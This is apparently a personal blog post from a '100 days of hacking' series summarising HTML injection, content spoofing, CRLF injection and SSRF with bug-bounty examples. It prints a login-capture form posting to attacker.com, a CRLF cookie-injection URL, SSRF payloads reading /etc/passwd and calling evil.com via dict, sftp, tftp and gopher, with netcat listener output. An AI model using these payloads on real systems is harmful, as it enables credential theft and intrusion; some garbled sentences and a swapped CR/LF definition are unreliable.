Day 4/100 Hack and Improvement

5 minute read

Day 4 from 100daysofhackandimprove comes with a variety of vulnerabilities which includes HTML Injection, Content Spoofing, Carriage Return Line Feed Injection (CRLF), and (rajesh place). Among the time, web vulnerabilities will always be impressive which will need a strong support from the attackers creativity and skills. This post for day 4 will be strongly supported by the content that has been gotten from Real-World Bug Hunting. Rajesh Ranjan has gathered and studied different resources in order to improve testing skills for SSRF.

HTML Injection and Content Spoofing

From Sam (CoffeeJunkie), These attacks allow malicious users to inject content in the target’s website. The attacker can inject HTML elements in order to design their attacks. As an example, attackers use the <form> tag which mimics a screen login.

HTML Injection

HTML injection occurs when a website allows an attacker to submit html tags, typically by some kind of input form or URL parameters, once the HTML tags are submitted, the target’s website proceeds to render the site with the attacker’s tags. This kind of attack can lead to different kind of phishing activities. The HTML code below will create a input form which is suppose to trick the victim to send their sensitive data such as passwords and usernames to the attacker’s site as the example down below.

<form method='POST' action='http://attacker.com/capture.php' id='login-form'>
      <input type='text' name='username' value=''>
      <input type='password' name='password' value=''>
      <input type='submit' value='submit'>
   </form>

Content Spoofing

This kind of attack is very similar to HTML injection, it differs because the attackers can just inject plain text, not HTML tags. This limitation is typically caused by sites either escaping any included HTML or HTML tags being stripped when the server sends the HTTP response.

Write Ups and Examples

HTML Injection

COINBASE COMMENT INJECTION THROUGH CHARACTER ENCODING

If you’re interested to check the full video, you have to check the write up. In this, the website was filtering HTML tags to defend against this attack, then in this, the website was filtering HTML tags to defend against this attack. If you’re interested in encoded values here you can find a swiss knife to encode and decode different values.

HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS In this case, the attacker tried to submit different kind of parameters in the reporting page of the bug bounty program at Hacker One. As something interesting, the attacker tried to full the markdown style at the time to submit the reports. In this case he bypassed the fix from the other report.

Security Content Spoofing

CONTENT SPOOFING OR TEXT INJECTION IN withinsecurity.com So the attacker at the time to look for the vulnerability realize some of the patterns related in in the URL which displays text. Then, he change the text in the URL in order to make it display differently. It ended up something like this.

oscp list

Carriage Return Line Feed Injection (CRLF)

Some vulnerabilities allow users to put encoded characters that have meaning for HTML and HTTP responses. Most of the cases developers try to sanitize the input, or some of them don’t sanitize them properly. If the server interpret the special characters, it can alter the original HTTP response which allows the attacker to manipulate the application’s behavior. Two common examples are the characters %0D and %0A which represent \n which is the carriage return and \r which is the line feed. These characters are the ones that are referred as CRLFs. Servers use these characters to identify things such as headers. Therefore a CRLF injection injection vulnerability occurs when the application does not sanitize the user’s input properly. An attacker can achieve HTTP smuggling and HTTP Splitting Attacks.

HTTP Request Smuggling

This attack occurs when the attacker is able to exploit a CRLF injection in order to append an extra HTTP request to the initial request. The application does not anticipate the CRLF injection, therefore the application treats these two requests as a single request. This type of vulnerability can result in cache poisoning, firewall evasion, request hijacking, or HTTP response splitting.

HTTP Splitting

This allows to split an HTTP response by injecting new headers. There are two methods that attackers use to split the response:

  1. The attacker uses CRLF characters to complete the initial response.
  2. Insert additional headers in order to generate a new HTTP response.

Sometimes the attacker may modify the response and not inject a completely new HTTP response. If the application limit the amount of characters that the attacker can submit, this can lead to the other side of the attack which is change headers such as location. If this happens, this can lead to XSS as well.

Write Ups and Explanations

V.SHOPIFY.COM RESPONSE SPLITTING

So the attacker discover an HTTP Splitting attack which allows to deface a website with the following url. The attacker injected the following characters %0d%0a. The attacker injected the following headers Content-Length and Content-Type.

TWITTER HTTP RESPONSE SPLITTING

The attacker used special chinese characters because the website was protected agains CRLF injection. The attack allowed to set a extra cookie. this is the following URL

# Encoded URL
https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=%E5%98%8A%E5%98%8DSet-Cookie:%20test

# Decoded URL 
https://twitter.com/i/safety/report_story?next_view=report_story_start&source=reporttweet&reported_user_id=1&reporter_user_id=1&is_media=true&is_promoted=true&reported_tweet_id=嘊嘍Set-Cookie: test

Besides this, he look out for way to escalate the attack to XSS.

Testing for URL Schema if you found a SSRF

Rajesh Ranjan has brought different ways to experiment and exploit SSRF vulnerabilities. The first thing to do when we find an SSRF is to test all the wrapper which are working, if the server blocks one wrapper, go and try another. if it’s your lucky day you might find one wrapper not blacklisted. There are some URL schema, for which you can test when you found an SSRF, such as the following:

file:///
dict://
sftp://
ldap://
tftp://
gopher://

file://

File is used to fetch a file from the file system. Look at the following examples:

http://example.com/ssrf.php?url=file:///etc/passwd (For Linux) 
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini (For windows)

dict://

DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol. Look at the following examples:

http://example.com/ssrf.php?dict://evil.com:1337/ 

From the URL above, the attacker create a listener which will result with a connection if successful.

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 31126)
CLIENT libcurl 7.40.0 </code>

Reference

sftp://

Sftp stands for SSH File Transfer Protocol, or Secure File Transfer Protocol is a separate protocol packaged with SSH that works in a similar way over a secure connection

http://example.com/ssrf.php?url=sftp://evil.com:1337/ 

As the last example, the URL above will allow the attacker to create a successful connection with a listener in port 1337

evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 37146)
SSH-2.0-libssh2_1.4.2

Reference

ldap://

LDAP stands for Lightweight Directory Access Protocol. As the name suggests, it is a lightweight client-server protocol for accessing directory services. Look at the example down below to generate a clear concept.

http://example.com/ssrf.php?url=ldap://localhost:1337/%0astats%0aquit

Reference

tftp://

Trivial File Transfer Protocol is a simple lockstep File Transfer Protocol which allows a client to get a file from or put a file onto a remote host. In the example down below, the attacker will succeed at testing UDP packets.

http://example.com/ssrf.php?url=tftp://evil.com:1337/TESTUDPPACKET

Result from the URL attack

evil.com:# nc -lvup 1337
Listening on [0.0.0.0] (family 0, port 1337)
TESTUDPPACKEToctettsize0blksize512timeout3

gopher://

The Gopher protocol is a communications protocol designed for distributing, searching, and retrieving documents in Internet Protocol networks.

Example: First of all, create a gopher.php file and host it on acttacker.com

<?php
   header('Location: gopher://evil.com:1337/_Hi%0Assrf%0Atest');
?> 

Then the attacker can get acess to attacker file through the following URL.

http://example.com/ssrf.php?url=http://attacker.com/gopher.php

The attack will result to the following TCP connection.

evil.com:# nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [192.168.0.12] port 1337 [tcp/*] accepted (family 2, sport 49398)
Hi
ssrf
test

Here there are different reports related to the scope of SSRF attacks and its capabilities.

https://hackerone.com/reports/508459

https://hackerone.com/reports/514224

https://hackerone.com/reports/643622

Conclusion

HTTP injection, Content Spoofing, CRLF vulnerabilities has a expand escope that will allow attackers to escalate vulnerabilities even further.

Leave a comment